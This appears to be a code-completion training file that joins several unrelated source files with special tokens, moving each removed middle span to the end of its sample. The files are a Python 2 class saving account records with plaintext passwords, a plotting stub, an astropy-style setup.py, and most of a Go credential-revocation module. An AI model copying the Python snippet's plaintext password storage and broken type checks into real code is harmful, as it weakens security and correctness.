""" with open("passwd", "a+") as f: f.write("{0}:{1}:{2}:{3}:{4}:{5}\n".format(record[0], record[1], record[2], record[3], record[4], record[5])) def flush_all(self): """ flush usr&passwd and account record info to record file """ with open("passwd", "w+") as f: if self.usr is not None: f.write("usr:{0}\n".format(self.usr)) if self.usr_key is not None: f.write("key:{0}\n".format(self.usr_key)) f.write("#{0}\t:\t{1}\t:\t{2}\t:\t{3}\t:\t{4}\t:\t{5}\n". format("Ower", "Account", "Alias", "Email", "Mobile", "Passwd")) for record in self.records: f.write("{0}:{1}:{2}:{3}:{4}:{5}\n".format(record[0], record[1], record[2], record[3], record[4], record[5])) def set_usr_info(self, info): """Export interface set usr&key to account info storage """ if type(info) is not tuple: raise TypeError if len(info) is not 2: raise ValueError self.usr = info[0] self.usr_key = info[1] self.flush_all() def set_key(self, key): """Export interface set usr key to account info storage """ if self.usr is None: raise UsrError, "Usr Is None." if type(key) is not str: raise TypeError if key is None: raise ValueError self.usr_key = key self.flush_all() def put_record(self, record): """Export interface """ if record is not tuple: raise TypeError if len(record) is not 6: raise ValueError self.records.append(record)<|fim▁hole|> self.flush_all() #Check repeat def append_record(self, record): """Export interface """ if type(record) is not tuple: raise TypeError if len(record) is not 6: raise ValueError self.records.append(record) self.flush_one_record(record) def put_records(self, records): pass def append_records(self, records): if type(records) is not list: raise TypeError for record in records: if type(record) is not tuple: raise TypeError if len(record) is not 6: raise ValueError self.records.append(record) self.flush_one_record(record) if __name__ == '__main__' : pass<|fim▁end|>
<|file_name|>_plot_complex.py<|end_file_name|><|fim▁begin|>from . import _plotting_mess<|fim▁hole|>files = _plotting_mess.complex_files function = _plotting_mess.complex_function<|fim▁end|>
data = _plotting_mess.complex_data databoxes = _plotting_mess.complex_databoxes
<|file_name|>setup.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python # Licensed under a 3-clause BSD style license - see LICENSE.rst import glob import os import sys import ah_bootstrap from setuptools import setup #A dirty hack to get around some early import/configurations ambiguities if sys.version_info[0] >= 3: import builtins else: import __builtin__ as builtins builtins._ASTROPY_SETUP_ = True from astropy_helpers.setup_helpers import (register_commands, adjust_compiler, get_debug_option, get_package_info, add_command_option) from astropy_helpers.git_helpers import get_git_devstr from astropy_helpers.version_helpers import generate_version_py # Get some values from the setup.cfg from distutils import config conf = config.ConfigParser() conf.read(['setup.cfg']) metadata = dict(conf.items('metadata')) PACKAGENAME = metadata.get('package_name', 'packagename') DESCRIPTION = metadata.get('description', 'Astropy affiliated package') AUTHOR = metadata.get('author', '') AUTHOR_EMAIL = metadata.get('author_email', '') LICENSE = metadata.get('license', 'unknown') URL = metadata.get('url', 'http://astropy.org') # Get the long description from the package's docstring #__import__(PACKAGENAME) #package = sys.modules[PACKAGENAME] LONG_DESCRIPTION = "" #package.__doc__ # Store the package name in a built-in variable so it's easy # to get from other parts of the setup infrastructure builtins._ASTROPY_PACKAGE_NAME_ = PACKAGENAME # VERSION should be PEP386 compatible (http://www.python.org/dev/peps/pep-0386) VERSION = '1.5.dev' # Indicates if this version is a release version RELEASE = 'dev' not in VERSION if not RELEASE: VERSION += get_git_devstr(False) # Populate the dict of setup command overrides; this should be done before # invoking any other functionality from distutils since it can potentially # modify distutils' behavior. cmdclassd = register_commands(PACKAGENAME, VERSION, RELEASE)<|fim▁hole|> is_bool=True) add_command_option('build', 'with-openmp', 'compile TARDIS without OpenMP', is_bool=True) add_command_option('develop', 'with-openmp', 'compile TARDIS without OpenMP', is_bool=True) # Adjust the compiler in case the default on this platform is to use a # broken one. adjust_compiler(PACKAGENAME) # Freeze build information in version.py generate_version_py(PACKAGENAME, VERSION, RELEASE, get_debug_option(PACKAGENAME)) # Treat everything in scripts except README.rst as a script to be installed scripts = [fname for fname in glob.glob(os.path.join('scripts', '*')) if os.path.basename(fname) != 'README.rst'] # Get configuration information from all of the various subpackages. # See the docstring for setup_helpers.update_package_files for more # details. package_info = get_package_info() # Add the project-global data package_info['package_data'].setdefault(PACKAGENAME, []) package_info['package_data'][PACKAGENAME].append('data/*') # Define entry points for command-line scripts entry_points = {} for hook in [('prereleaser', 'middle'), ('releaser', 'middle'), ('postreleaser', 'before'), ('postreleaser', 'middle')]: hook_ep = 'zest.releaser.' + '.'.join(hook) hook_name = 'astropy.release.' + '.'.join(hook) hook_func = 'astropy.utils.release:' + '_'.join(hook) entry_points[hook_ep] = ['%s = %s' % (hook_name, hook_func)] # Include all .c files, recursively, including those generated by # Cython, since we can not do this in MANIFEST.in with a "dynamic" # directory name. c_files = [] for root, dirs, files in os.walk(PACKAGENAME): for filename in files: if filename.endswith('.c'): c_files.append( os.path.join( os.path.relpath(root, PACKAGENAME), filename)) package_info['package_data'][PACKAGENAME].extend(c_files) setup(name=PACKAGENAME + '-sn', version=VERSION, description=DESCRIPTION, scripts=scripts, requires=['astropy'], install_requires=['astropy'], provides=[PACKAGENAME], author=AUTHOR, author_email=AUTHOR_EMAIL, license=LICENSE, url=URL, long_description=LONG_DESCRIPTION, cmdclass=cmdclassd, zip_safe=False, use_2to3=True, entry_points=entry_points, **package_info )<|fim▁end|>
add_command_option('install', 'with-openmp', 'compile TARDIS without OpenMP',
<|file_name|>revocation.go<|end_file_name|><|fim▁begin|>package irma import ( "context" "database/sql/driver" "encoding/json" "fmt" "math/bits" "sort" "strings" "sync" "time" "github.com/alexandrevicenzi/go-sse" "github.com/fxamacker/cbor" "github.com/getsentry/raven-go" "github.com/go-errors/errors" "github.com/hashicorp/go-multierror" "github.com/jinzhu/gorm" "github.com/privacybydesign/gabi" "github.com/privacybydesign/gabi/big" "github.com/privacybydesign/gabi/revocation" "github.com/privacybydesign/gabi/signed" sseclient "github.com/sietseringers/go-sse" _ "github.com/jinzhu/gorm/dialects/mysql" _ "github.com/jinzhu/gorm/dialects/postgres" ) type ( // RevocationStorage stores and retrieves revocation-related data from and to a SQL database, // and offers a revocation API for all other irmago code, including a Revoke() method that // revokes an earlier issued credential. RevocationStorage struct { conf *Configuration sqldb sqlRevStorage memdb *memRevStorage sqlMode bool settings RevocationSettings Keys RevocationKeys client RevocationClient ServerSentEvents *sse.Server close chan struct{} events chan *sseclient.Event } // RevocationClient offers an HTTP client to the revocation server endpoints. RevocationClient struct { Conf *Configuration Settings RevocationSettings http *HTTPTransport } // RevocationKeys contains helper functions for retrieving revocation private and public keys // from an irma.Configuration instance. RevocationKeys struct { Conf *Configuration } // RevocationSetting contains revocation settings for a given credential type. RevocationSetting struct { Server bool `json:"server,omitempty" mapstructure:"server"` Authority bool `json:"authority,omitempty" mapstructure:"authority"` RevocationServerURL string `json:"revocation_server_url,omitempty" mapstructure:"revocation_server_url"` Tolerance uint64 `json:"tolerance,omitempty" mapstructure:"tolerance"` // in seconds, min 30 SSE bool `json:"sse,omitempty" mapstructure:"sse"` // set to now whenever a new update is received, or when the RA indicates // there are no new updates. Thus it specifies up to what time our nonrevocation // guarantees lasts. updated time.Time } RevocationSettings map[CredentialTypeIdentifier]*RevocationSetting ) // Structs corresponding to SQL table rows, ending in Record type ( // signedMessage is a signed.Message with DB (un)marshaling methods. signedMessage signed.Message // RevocationAttribute is a big.Int with DB (un)marshaling methods. RevocationAttribute big.Int // eventHash is a revocation.Hash with DB (un)marshaling methods. eventHash revocation.Hash AccumulatorRecord struct { CredType CredentialTypeIdentifier `gorm:"primary_key"` Data signedMessage PKCounter *uint `gorm:"primary_key;auto_increment:false"` } EventRecord struct { Index *uint64 `gorm:"primary_key;column:eventindex;auto_increment:false"` CredType CredentialTypeIdentifier `gorm:"primary_key"` PKCounter *uint `gorm:"primary_key;auto_increment:false"` E *RevocationAttribute ParentHash eventHash } // IssuanceRecord contains information generated during issuance, needed for later revocation. IssuanceRecord struct { Key string `gorm:"primary_key;column:revocationkey"` CredType CredentialTypeIdentifier `gorm:"primary_key"` Issued int64 `gorm:"primary_key;auto_increment:false"` PKCounter *uint Attr *RevocationAttribute ValidUntil int64 RevokedAt int64 `json:",omitempty"` // 0 if not currently revoked } ) var ( ErrRevocationStateNotFound = errors.New("revocation state not found") ErrUnknownRevocationKey = errors.New("unknown revocationKey") ErrorUnknownCredentialType = errors.New("unknown credential type") ) // RevocationParameters contains global revocation constants and default values. var RevocationParameters = struct { // DefaultUpdateEventCount specifies how many revocation events are attached to session requests // for the client to update its revocation state. DefaultUpdateEventCount uint64 <|fim▁hole|> // RequestorUpdateInterval is the time period in minutes for requestor servers // updating their revocation state at th RA. RequestorUpdateInterval uint64 // DefaultTolerance is the default tolerance in seconds: nonrevocation should be proved // by clients up to maximally this amount of seconds ago at verification time. If not, the // server will report the time up until nonrevocation of the attribute is guaranteed to the requestor. DefaultTolerance uint64 // If server mode is enabled for a credential type, then once every so many seconds // the timestamp in each accumulator is updated to now. AccumulatorUpdateInterval uint64 // DELETE issuance records of expired credential every so many minutes DeleteIssuanceRecordsInterval uint64 // ClientUpdateInterval is the time interval with which the irmaclient periodically // retrieves a revocation update from the RA and updates its revocation state with a small but // increasing probability. ClientUpdateInterval uint64 // ClientDefaultUpdateSpeed is the amount of time in hours after which it becomes very likely // that the app will update its witness, quickly after it has been opened. ClientDefaultUpdateSpeed uint64 // ClientUpdateTimeout is the amount of time in milliseconds that the irmaclient waits // for nonrevocation witness updating to complete, before it continues with the session even // if updating is not yet done (in which case the candidate set computed by the client // may contain credentials that were revoked by one of the requestor's update messages). ClientUpdateTimeout uint64 // Cache-control: max-age HTTP return header (in seconds) EventsCacheMaxAge uint64 UpdateMinCount uint64 UpdateMaxCount uint64 UpdateMinCountPower int UpdateMaxCountPower int }{ RequestorUpdateInterval: 10, DefaultTolerance: 10 * 60, AccumulatorUpdateInterval: 60, DeleteIssuanceRecordsInterval: 5 * 60, ClientUpdateInterval: 10, ClientDefaultUpdateSpeed: 7 * 24, ClientUpdateTimeout: 1000, UpdateMinCountPower: 4, UpdateMaxCountPower: 9, EventsCacheMaxAge: 60 * 60, } func init() { // compute derived revocation parameters RevocationParameters.UpdateMinCount = 1 << RevocationParameters.UpdateMinCountPower RevocationParameters.UpdateMaxCount = 1 << RevocationParameters.UpdateMaxCountPower RevocationParameters.DefaultUpdateEventCount = RevocationParameters.UpdateMinCount } // EnableRevocation creates an initial accumulator for a given credential type. This function is the // only way to create such an initial accumulator and it must be called before anyone can use // revocation for this credential type. Requires the issuer private key. func (rs *RevocationStorage) EnableRevocation(id CredentialTypeIdentifier, sk *revocation.PrivateKey) error { enabled, err := rs.Exists(id, sk.Counter) if err != nil { return err } if enabled { return errors.New("revocation already enabled") } update, err := revocation.NewAccumulator(sk) if err != nil { return err } if err = rs.addUpdate(rs.sqldb, id, update, true); err != nil { return err } return nil } // Exists returns whether or not an accumulator exists in the database for the given credential type. func (rs *RevocationStorage) Exists(id CredentialTypeIdentifier, counter uint) (bool, error) { // only requires sql implementation return rs.sqldb.Exists((*AccumulatorRecord)(nil), map[string]interface{}{"cred_type": id, "pk_counter": counter}) } // Revocation update message methods func (rs *RevocationStorage) Events(id CredentialTypeIdentifier, pkcounter uint, from, to uint64) (*revocation.EventList, error) { if from >= to || from%RevocationParameters.UpdateMinCount != 0 || to%RevocationParameters.UpdateMinCount != 0 { return nil, errors.New("illegal update interval") } // Only requires SQL implementation var events []*revocation.Event if err := rs.sqldb.Transaction(func(tx sqlRevStorage) error { var records []*EventRecord if err := tx.Find(&records, "cred_type = ? and pk_counter = ? and eventindex >= ? and eventindex < ?", id, pkcounter, from, to, ); err != nil { return err } if len(records) == 0 { return ErrRevocationStateNotFound } for _, r := range records { events = append(events, r.Event()) } return nil }); err != nil { return nil, err } if events[len(events)-1].Index < to-1 { return nil, errors.New("interval end too small") } return revocation.NewEventList(events...), nil } func (rs *RevocationStorage) UpdateLatest(id CredentialTypeIdentifier, count uint64, counter *uint) (map[uint]*revocation.Update, error) { var updates map[uint]*revocation.Update if rs.sqlMode { if err := rs.sqldb.Transaction(func(tx sqlRevStorage) error { var ( records []*AccumulatorRecord events []*EventRecord ) where := map[string]interface{}{"cred_type": id} if counter != nil { where["pk_counter"] = *counter } if err := tx.Last(&records, where); err != nil { return err } if count > 0 { if err := tx.Latest(&events, count, where); err != nil { return err } } updates = rs.newUpdates(records, events) return nil }); err != nil { return nil, err } } else { updates = rs.memdb.Latest(id, count) if len(updates) == 0 { return nil, ErrRevocationStateNotFound } } for k, u := range updates { pk, err := rs.Keys.PublicKey(id.IssuerIdentifier(), k) if err != nil { return nil, err } _, err = u.Verify(pk) if err != nil { return nil, err } } return updates, nil } func (*RevocationStorage) newUpdates(records []*AccumulatorRecord, events []*EventRecord) map[uint]*revocation.Update { updates := make(map[uint]*revocation.Update, len(records)) for _, r := range records { updates[*r.PKCounter] = &revocation.Update{SignedAccumulator: r.SignedAccumulator()} } for _, e := range events { update := updates[*e.PKCounter] if update == nil { continue } update.Events = append(update.Events, e.Event()) } for _, update := range updates { sort.Slice(update.Events, func(i, j int) bool { return update.Events[i].Index < update.Events[j].Index }) } return updates } func (rs *RevocationStorage) AddUpdate(id CredentialTypeIdentifier, record *revocation.Update) error { if rs.sqlMode { return rs.sqldb.Transaction(func(tx sqlRevStorage) error { return rs.addUpdate(tx, id, record, false) }) } return rs.addUpdate(rs.sqldb, id, record, false) } func (rs *RevocationStorage) addUpdate(tx sqlRevStorage, id CredentialTypeIdentifier, update *revocation.Update, create bool) error { // Unmarshal and verify the record against the appropriate public key pk, err := rs.Keys.PublicKey(id.IssuerIdentifier(), update.SignedAccumulator.PKCounter) if err != nil { return err } if _, err = update.Verify(pk); err != nil { return err } // Save record if rs.sqlMode { save := tx.Save if create { save = tx.Insert } if err = save(new(AccumulatorRecord).Convert(id, update.SignedAccumulator)); err != nil { return err } for _, event := range update.Events { if err = tx.Insert(new(EventRecord).Convert(id, update.SignedAccumulator.PKCounter, event)); err != nil { return err } } } else { rs.memdb.Insert(id, update) } s := rs.settings.Get(id) s.updated = time.Now() // POST record to listeners, if any, asynchroniously rs.PostUpdate(id, update) return nil } // Issuance records func (rs *RevocationStorage) AddIssuanceRecord(r *IssuanceRecord) error { return rs.sqldb.Insert(r) } func (rs *RevocationStorage) IssuanceRecords(id CredentialTypeIdentifier, key string, issued time.Time) ([]*IssuanceRecord, error) { where := map[string]interface{}{"cred_type": id, "revocationkey": key, "revoked_at": 0} if !issued.IsZero() { where["Issued"] = issued.UnixNano() } var r []*IssuanceRecord err := rs.sqldb.Find(&r, where) if err != nil { return nil, err } if len(r) == 0 { return nil, ErrUnknownRevocationKey } return r, nil } // Revocation methods // Revoke revokes the credential(s) specified by key and issued, if found within the current database, // by updating their revocation time to now, removing their revocation attribute from the current accumulator, // and updating the revocation database on disk. // If issued is not specified, i.e. passed the zero value, all credentials specified by key are revoked. func (rs *RevocationStorage) Revoke(id CredentialTypeIdentifier, key string, issued time.Time) error { if !rs.settings.Get(id).Authority { return errors.Errorf("cannot revoke %s", id) } return rs.sqldb.Transaction(func(tx sqlRevStorage) error { return rs.revoke(tx, id, key, issued) }) } func (rs *RevocationStorage) revoke(tx sqlRevStorage, id CredentialTypeIdentifier, key string, issued time.Time) error { var err error issrecords, err := rs.IssuanceRecords(id, key, issued) if err != nil { return err } // get all relevant accumulators and events from the database accs, events, err := rs.revokeReadRecords(tx, id, issrecords) // For each issuance record, perform revocation, adding an Event and advancing the accumulator for _, issrecord := range issrecords { e := events[*issrecord.PKCounter] newacc, event, err := rs.revokeCredential(tx, issrecord, accs[*issrecord.PKCounter], e[len(e)-1]) accs[*issrecord.PKCounter] = newacc if err != nil { return err } events[*issrecord.PKCounter] = append(e, event) } // Gather accumulators and update events per key counter into revocation updates, // and add them to the database for counter := range accs { sk, err := rs.Keys.PrivateKey(id.IssuerIdentifier(), counter) if err != nil { return err } // exclude parent event from the events update, err := revocation.NewUpdate(sk, accs[counter], events[counter][1:]) if err != nil { return err } if err = rs.addUpdate(tx, id, update, false); err != nil { return err } } return nil } func (rs *RevocationStorage) revokeReadRecords( tx sqlRevStorage, id CredentialTypeIdentifier, issrecords []*IssuanceRecord, ) (map[uint]*revocation.Accumulator, map[uint][]*revocation.Event, error) { // gather all keys used in the issuance requests var keycounters []uint for _, issrecord := range issrecords { keycounters = append(keycounters, *issrecord.PKCounter) } // get all relevant accumulators from the database var records []AccumulatorRecord if err := tx.Find(&records, "cred_type = ? and pk_counter in (?)", id, keycounters); err != nil { return nil, nil, err } var eventrecords []EventRecord err := tx.Find(&eventrecords, "eventindex = (?)", tx.gorm. Table("event_records e2"). Select("max(e2.eventindex)"). Where("e2.cred_type = event_records.cred_type and e2.pk_counter = event_records.pk_counter"). QueryExpr(), ) if err != nil { return nil, nil, err } accs := map[uint]*revocation.Accumulator{} events := map[uint][]*revocation.Event{} for _, r := range records { sacc := r.SignedAccumulator() pk, err := rs.Keys.PublicKey(id.IssuerIdentifier(), sacc.PKCounter) if err != nil { return nil, nil, err } accs[*r.PKCounter], err = sacc.UnmarshalVerify(pk) if err != nil { return nil, nil, err } } for _, e := range eventrecords { events[*e.PKCounter] = append(events[*e.PKCounter], e.Event()) } return accs, events, nil } func (rs *RevocationStorage) revokeCredential( tx sqlRevStorage, issrecord *IssuanceRecord, acc *revocation.Accumulator, parent *revocation.Event, ) (*revocation.Accumulator, *revocation.Event, error) { issrecord.RevokedAt = time.Now().UnixNano() if err := tx.Save(&issrecord); err != nil { return nil, nil, err } sk, err := rs.Keys.PrivateKey(issrecord.CredType.IssuerIdentifier(), *issrecord.PKCounter) if err != nil { return nil, nil, err } newacc, event, err := acc.Remove(sk, (*big.Int)(issrecord.Attr), parent) if err != nil { return nil, nil, err } return newacc, event, nil } // Accumulator methods func (rs *RevocationStorage) Accumulator(id CredentialTypeIdentifier, pkcounter uint) ( *revocation.SignedAccumulator, error, ) { return rs.accumulator(rs.sqldb, id, pkcounter) } // accumulator retrieves, verifies and deserializes the accumulator of the given type and key. func (rs *RevocationStorage) accumulator(tx sqlRevStorage, id CredentialTypeIdentifier, pkcounter uint) ( *revocation.SignedAccumulator, error, ) { var err error var sacc *revocation.SignedAccumulator if rs.sqlMode { record := &AccumulatorRecord{} if err = tx.Last(record, map[string]interface{}{"cred_type": id, "pk_counter": pkcounter}); err != nil { return nil, err } sacc = record.SignedAccumulator() } else { sacc = rs.memdb.SignedAccumulator(id, pkcounter) if sacc == nil { return nil, ErrRevocationStateNotFound } } pk, err := rs.Keys.PublicKey(id.IssuerIdentifier(), sacc.PKCounter) if err != nil { return nil, err } _, err = sacc.UnmarshalVerify(pk) if err != nil { return nil, err } return sacc, nil } func (rs *RevocationStorage) updateAccumulatorTimes() error { if !rs.sqlMode { return nil } var types []CredentialTypeIdentifier for id, settings := range rs.settings { if settings.Authority { types = append(types, id) } } return rs.sqldb.Transaction(func(tx sqlRevStorage) error { var err error var records []AccumulatorRecord Logger.Tracef("updating accumulator times") if err = tx.Find(&records, "cred_type in (?)", types); err != nil { return err } for _, r := range records { pk, err := rs.Keys.PublicKey(r.CredType.IssuerIdentifier(), *r.PKCounter) if err != nil { return err } sk, err := rs.Keys.PrivateKey(r.CredType.IssuerIdentifier(), *r.PKCounter) if err != nil { return err } acc, err := r.SignedAccumulator().UnmarshalVerify(pk) if err != nil { return err } acc.Time = time.Now().Unix() sacc, err := acc.Sign(sk) if err != nil { return err } r.Data = signedMessage(sacc.Data) if err = tx.Save(r); err != nil { return err } s := rs.settings.Get(r.CredType) s.updated = time.Now() // POST record to listeners, if any, asynchroniously rs.PostUpdate(r.CredType, &revocation.Update{SignedAccumulator: sacc}) } return nil }) } // Methods to update from remote revocation server func (rs *RevocationStorage) SyncDB(id CredentialTypeIdentifier) error { ct := rs.conf.CredentialTypes[id] if ct == nil { return ErrorUnknownCredentialType } if settings, ok := rs.settings[id]; ok && settings.Authority { return nil } Logger.WithField("credtype", id).Tracef("fetching revocation updates") updates, err := rs.client.FetchUpdatesLatest(id, ct.RevocationUpdateCount) if err != nil { return err } for _, u := range updates { if err = rs.AddUpdate(id, u); err != nil { return err } } // bump updated even if no new records were added rs.settings.Get(id).updated = time.Now() return nil } func (rs *RevocationStorage) SyncIfOld(id CredentialTypeIdentifier, maxage uint64) error { if rs.settings.Get(id).updated.Before(time.Now().Add(time.Duration(-maxage) * time.Second)) { if err := rs.SyncDB(id); err != nil { return err } } return nil } // SaveIssuanceRecord either stores the issuance record locally, if we are the revocation server of // the crecential type, or it signs and sends it to the remote revocation server. func (rs *RevocationStorage) SaveIssuanceRecord(id CredentialTypeIdentifier, rec *IssuanceRecord, sk *gabi.PrivateKey) error { credtype := rs.conf.CredentialTypes[id] if credtype == nil { return ErrorUnknownCredentialType } if !credtype.RevocationSupported() { return errors.New("cannot save issuance record: credential type does not support revocation") } // Just store it if we are the revocation server for this credential type settings := rs.settings.Get(id) if settings.Authority { return rs.AddIssuanceRecord(rec) } // We have to send it, sign it first if settings.RevocationServerURL == "" { return errors.New("cannot send issuance record: no server_url configured") } rsk, err := sk.RevocationKey() if err != nil { return err } return rs.client.PostIssuanceRecord(id, rsk, rec, settings.RevocationServerURL) } // Misscelaneous methods func (rs *RevocationStorage) handleSSEUpdates() { for { select { case event := <-rs.events: segments := strings.Split(event.URI, "/") if len(segments) < 2 { Logger.Warn("malformed SSE URL: ", event.URI) continue } var ( id = NewCredentialTypeIdentifier(segments[len(segments)-2]) logger = Logger.WithField("credtype", id) update revocation.Update err error ) if err = json.Unmarshal(event.Data, &update); err != nil { logger.Warn("failed to unmarshal pushed update: ", err) } else { logger.Trace("received SSE update event") if err = rs.AddUpdate(id, &update); err != nil { logger.Warn("failed to add pushed update: ", err) } } case <-rs.close: Logger.Trace("stop handling SSE events") return } } } func (rs *RevocationStorage) listenUpdates(id CredentialTypeIdentifier, url string) { logger := Logger.WithField("credtype", id) logger.Trace("listening for SSE update events") // make a context that closes when rs.close closes ctx, cancel := context.WithCancel(context.Background()) go func() { select { case <-rs.close: cancel() case <-ctx.Done(): return } }() err := sseclient.Notify(ctx, url, true, rs.events) if err != nil { logger.Warn("SSE connection closed: ", err) } } func updateURL(id CredentialTypeIdentifier, conf *Configuration, rs RevocationSettings) ([]string, error) { settings := rs[id] if settings != nil && settings.RevocationServerURL != "" { return []string{settings.RevocationServerURL}, nil } else { credtype := conf.CredentialTypes[id] if credtype == nil { return nil, ErrorUnknownCredentialType } if !credtype.RevocationSupported() { return nil, errors.New("credential type does not support revocation") } return credtype.RevocationServers, nil } } func (rs *RevocationStorage) Load(debug bool, dbtype, connstr string, settings RevocationSettings) error { settings.fixCase(rs.conf) settings.fixSlash() var t *CredentialTypeIdentifier for id, s := range settings { if !s.Authority { if s.Server && s.RevocationServerURL == "" { return errors.Errorf("revocation server mode for %s requires URL to be configured", id.String()) } } else { s.Server = true if s.RevocationServerURL != "" { return errors.Errorf("revocation authority mode for %s cannot be combined with URL", id.String()) } } if s.Server { t = &id } if s.SSE { urls, err := updateURL(id, rs.conf, settings) if err != nil { return err } if rs.close == nil { rs.close = make(chan struct{}) rs.events = make(chan *sseclient.Event) go rs.handleSSEUpdates() } url := fmt.Sprintf("%s/revocation/%s/updateevents", urls[0], id.String()) go rs.listenUpdates(id, url) } } if t != nil && connstr == "" { return errors.Errorf("revocation mode for %s requires SQL database but no connection string given", *t) } rs.conf.Scheduler.Every(RevocationParameters.AccumulatorUpdateInterval).Seconds().Do(func() { if err := rs.updateAccumulatorTimes(); err != nil { err = errors.WrapPrefix(err, "failed to write updated accumulator record", 0) raven.CaptureError(err, nil) } }) rs.conf.Scheduler.Every(RevocationParameters.DeleteIssuanceRecordsInterval).Minutes().Do(func() { if !rs.sqlMode { return } if err := rs.sqldb.Delete(IssuanceRecord{}, "valid_until < ?", time.Now().UnixNano()); err != nil { err = errors.WrapPrefix(err, "failed to delete expired issuance records", 0) raven.CaptureError(err, nil) } }) if connstr == "" { Logger.Trace("Using memory revocation database") rs.memdb = newMemStorage() rs.sqlMode = false } else { Logger.Trace("Connecting to revocation SQL database") db, err := newSqlStorage(debug, dbtype, connstr) if err != nil { return err } rs.sqldb = db rs.sqlMode = true } if settings != nil { rs.settings = settings } else { rs.settings = RevocationSettings{} } for id, settings := range rs.settings { if settings.Tolerance != 0 && settings.Tolerance < 30 { return errors.Errorf("max_nonrev_duration setting for %s must be at least 30 seconds, was %d", id, settings.Tolerance) } } rs.client = RevocationClient{Conf: rs.conf, Settings: rs.settings} rs.Keys = RevocationKeys{Conf: rs.conf} return nil } func (rs *RevocationStorage) Close() error { if rs.close != nil { close(rs.close) } return rs.sqldb.Close() } // SetRevocationUpdates retrieves the latest revocation records from the database, and attaches // them to the request, for each credential type for which a nonrevocation proof is requested in // b.Revocation. func (rs *RevocationStorage) SetRevocationUpdates(b *BaseRequest) error { if len(b.Revocation) == 0 { return nil } var err error for credid, params := range b.Revocation { ct := rs.conf.CredentialTypes[credid] if ct == nil { return ErrorUnknownCredentialType } if !ct.RevocationSupported() { return errors.Errorf("cannot request nonrevocation proof for %s: revocation not enabled in scheme", credid) } settings := rs.settings.Get(credid) tolerance := settings.Tolerance if params.Tolerance != 0 { tolerance = params.Tolerance } if err = rs.SyncIfOld(credid, tolerance/2); err != nil { updated := settings.updated if !updated.IsZero() { Logger.Warnf("failed to fetch revocation updates for %s, nonrevocation is guaranteed only until %s ago:", credid, time.Now().Sub(updated).String()) Logger.Warn(err) } else { Logger.Errorf("revocation is disabled for %s: failed to fetch revocation updates and none are known locally", credid) Logger.Warn(err) // We can offer no nonrevocation guarantees at all while the requestor explicitly // asked for it; fail the session by returning an error return err } } params.Updates, err = rs.UpdateLatest(credid, ct.RevocationUpdateCount, nil) if err != nil { return err } } return nil } func (rs *RevocationStorage) PostUpdate(id CredentialTypeIdentifier, update *revocation.Update) { if rs.ServerSentEvents == nil || !rs.settings.Get(id).Authority { return } Logger.WithField("credtype", id).Tracef("sending SSE update event") bts, _ := json.Marshal(update) rs.ServerSentEvents.SendMessage("revocation/"+id.String(), sse.SimpleMessage(string(bts))) } func (client RevocationClient) PostIssuanceRecord(id CredentialTypeIdentifier, sk *revocation.PrivateKey, rec *IssuanceRecord, url string) error { message, err := signed.MarshalSign(sk.ECDSA, rec) if err != nil { return err } return client.transport(false).Post( fmt.Sprintf("%s/revocation/%s/issuancerecord/%d", url, id, sk.Counter), nil, []byte(message), ) } func (client RevocationClient) FetchUpdateFrom(id CredentialTypeIdentifier, pkcounter uint, from uint64) (*revocation.Update, error) { // First fetch accumulator + latest few events ct := client.Conf.CredentialTypes[id] if ct == nil { return nil, ErrorUnknownCredentialType } update, err := client.FetchUpdateLatest(id, pkcounter, ct.RevocationUpdateCount) if err != nil { return nil, err } pk, err := RevocationKeys{client.Conf}.PublicKey(id.IssuerIdentifier(), pkcounter) if err != nil { return nil, err } acc, err := update.SignedAccumulator.UnmarshalVerify(pk) if err != nil { return nil, err } to := acc.Index - uint64(len(update.Events)) if from >= to { return update, err } // Fetch events not included in the response above indices := binaryPartition(from, to) eventsChan := make(chan *revocation.EventList) var wg sync.WaitGroup var eventsList []*revocation.EventList for _, i := range indices { wg.Add(1) go func(i [2]uint64) { events := &revocation.EventList{ComputeProduct: true} if e := client.getMultiple( client.Conf.CredentialTypes[id].RevocationServers, fmt.Sprintf("/revocation/%s/events/%d/%d/%d", id, pkcounter, i[0], i[1]), events, ); e != nil { err = e } eventsChan <- events wg.Done() }(i) } // Gather responses from async GETs above wg.Add(1) go func() { for i := 0; i < len(indices); i++ { e := <-eventsChan eventsList = append(eventsList, e) } wg.Done() }() // Wait for everything to be done wg.Wait() if err != nil { return nil, err } el, err := revocation.FlattenEventLists(eventsList) if err != nil { return nil, err } return update, update.Prepend(el) } func (client RevocationClient) FetchUpdateLatest(id CredentialTypeIdentifier, pkcounter uint, count uint64) (*revocation.Update, error) { urls, err := updateURL(id, client.Conf, client.Settings) if err != nil { return nil, err } update := &revocation.Update{} return update, client.getMultiple( urls, fmt.Sprintf("/revocation/%s/update/%d/%d", id, count, pkcounter), &update, ) } func (client RevocationClient) FetchUpdatesLatest(id CredentialTypeIdentifier, count uint64) (map[uint]*revocation.Update, error) { urls, err := updateURL(id, client.Conf, client.Settings) if err != nil { return nil, err } update := map[uint]*revocation.Update{} return update, client.getMultiple( urls, fmt.Sprintf("/revocation/%s/update/%d", id, count), &update, ) } func (client RevocationClient) getMultiple(urls []string, path string, dest interface{}) error { var ( errs multierror.Error transport = client.transport(false) ) for _, url := range urls { transport.Server = url err := transport.Get(path, dest) if err == nil { return nil } else { errs.Errors = append(errs.Errors, err) } } return &errs } func (client RevocationClient) transport(forceHTTPS bool) *HTTPTransport { if client.http == nil { client.http = NewHTTPTransport("", forceHTTPS) client.http.Binary = true } return client.http } func (rs RevocationKeys) PrivateKeyLatest(issid IssuerIdentifier) (*revocation.PrivateKey, error) { sk, err := rs.Conf.PrivateKeys.Latest(issid) if err != nil { return nil, err } if sk == nil { return nil, errors.Errorf("unknown private key: %s", issid) } revsk, err := sk.RevocationKey() if err != nil { return nil, err } return revsk, nil } func (rs RevocationKeys) PrivateKey(issid IssuerIdentifier, counter uint) (*revocation.PrivateKey, error) { sk, err := rs.Conf.PrivateKeys.Get(issid, counter) if err != nil { return nil, err } if sk == nil { return nil, errors.Errorf("unknown private key: %s", issid) } revsk, err := sk.RevocationKey() if err != nil { return nil, err } return revsk, nil } func (rs RevocationKeys) PublicKey(issid IssuerIdentifier, counter uint) (*revocation.PublicKey, error) { pk, err := rs.Conf.PublicKey(issid, counter) if err != nil { return nil, err } if pk == nil { return nil, errors.Errorf("unknown public key: %s-%d", issid, counter) } revpk, err := pk.RevocationKey() if err != nil { return nil, err } return revpk, nil } // Conversion methods to/from database structs, SQL table rows, gob func (e *EventRecord) Event() *revocation.Event { return &revocation.Event{ Index: *e.Index, E: (*big.Int)(e.E), ParentHash: revocation.Hash(e.ParentHash), } } func 